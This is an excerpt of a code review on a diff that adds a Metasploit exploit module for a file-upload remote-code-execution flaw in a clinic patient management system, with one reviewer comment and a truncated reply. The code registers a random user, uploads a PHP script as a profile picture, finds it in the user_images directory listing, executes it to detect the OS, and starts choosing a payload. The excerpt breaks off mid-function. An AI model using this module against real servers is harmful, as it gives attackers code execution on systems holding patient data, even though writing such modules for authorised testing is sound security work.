modules/exploits/multi/http/clinic_pms_fileupload_rce.rb

```diff
@@ -0,0 +1,249 @@
+      CheckCode::Vulnerable
+    else
+      vprint_error("File #{dummy_filename} not found in /pms/user_images. Target may not be vulnerable.")
+      CheckCode::Unknown
+    end
+  end
+
+  def upload_shell
+    random_user = Rex::Text.rand_text_alphanumeric(8)
+    random_password = Rex::Text.rand_text_alphanumeric(12)
+    detection_basename = Rex::Text.rand_text_alphanumeric(8).to_s
+    detection_filename = "#{detection_basename}.php"
+
+    # Step 1: Detect the OS
+    detection_script = <<~PHP
+      <?php
+      echo PHP_OS . "\\n";
+      ?>
+    PHP
+
+    vprint_status("Uploading OS detection script as #{detection_filename}...")
+    post_data = Rex::MIME::Message.new
+    post_data.add_part(random_user, nil, nil, 'form-data; name="display_name"')
+    post_data.add_part(random_user, nil, nil, 'form-data; name="user_name"')
+    post_data.add_part(random_password, nil, nil, 'form-data; name="password"')
+    post_data.add_part(detection_script, 'application/x-php', nil, "form-data; name=\"profile_picture\"; filename=\"#{detection_filename}\"")
+    post_data.add_part('', nil, nil, 'form-data; name="save_user"')
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'users.php'),
+      'method' => 'POST',
+      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+      'data' => post_data.to_s
+    })
+
+    fail_with(Failure::UnexpectedReply, 'Failed to upload OS detection script') unless res && res.code == 302
+    vprint_good('OS detection script uploaded successfully!')
+
+    # Step 2: Retrieve the actual uploaded filename
+    vprint_status('Retrieving directory listing to identify detection script...')
+    sleep datastore['LISTING_DELAY']
+
+    res_listing = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'user_images/'),
+      'method' => 'GET'
+    })
+
+    fail_with(Failure::UnexpectedReply, 'Failed to retrieve directory listing') unless res_listing && res_listing.code == 200
+
+    match = res_listing.body&.match(/<a href="(\d+#{Regexp.escape(detection_basename)}\w*\.php)"/)
+    fail_with(Failure::NotFound, 'Uploaded OS detection script not found in directory listing') if match.nil?
+
+    actual_detection_filename = match[1]
+    vprint_status("Detected script filename: #{actual_detection_filename}")
+
+    # Step 3: Execute the detection script
+    detection_url = normalize_uri(target_uri.path, 'user_images', actual_detection_filename)
+    vprint_status("Executing OS detection script at #{detection_url}...")
+    res = send_request_cgi({
+      'uri' => detection_url,
+      'method' => 'GET'
+    })
+
+    fail_with(Failure::UnexpectedReply, 'Failed to execute OS detection script') unless res && res.code == 200 && !res.body.nil?
+    detected_os = res.body.strip.downcase
+    vprint_status("Detected OS: #{detected_os}")
+
+    # Step 4: Choose payload based on OS
+    if detected_os.include?('win')
+      payload_content = get_write_exec_payload
```

Comment:
Is there particular reason to use detection of OS? Payload should be working regardless if the module uses `get_write_exec_payload`. The OS detection seems like overhead as user can simply choose to delete files afterwards, no? Of course, it's okay to keep it like this if there's reason for it.

Reply:
Okay, thank